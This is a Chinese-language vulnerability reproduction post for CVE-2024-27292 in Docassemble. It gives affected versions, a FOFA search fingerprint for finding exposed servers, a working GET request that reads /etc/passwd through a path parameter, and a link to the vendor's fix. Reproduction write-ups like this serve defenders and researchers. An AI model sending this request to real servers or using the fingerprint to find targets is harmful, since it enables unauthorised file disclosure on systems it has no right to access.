自学内容网 自学内容网

CVE-2024-27292:Docassemble任意文件读取漏洞复现 [附POC]

CVE-2024-27292:Docassemble任意文件读取漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。Docassemble 1.4.53至1.4.96版本存在安全漏洞,该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问导致任意文件读取。

0x03 影响版本

Docassemble Docassemble 1.4.96
Docassemble Docassemble 1.4.53

0x04 漏洞环境

FOFA语法:icon_hash=“-575790689”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /interview?i=/etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

3.复现

查看/etc/passwd文件
在这里插入图片描述

0x06 修复建议

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv


原文地址:https://blog.csdn.net/weixin_48539059/article/details/140350120

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!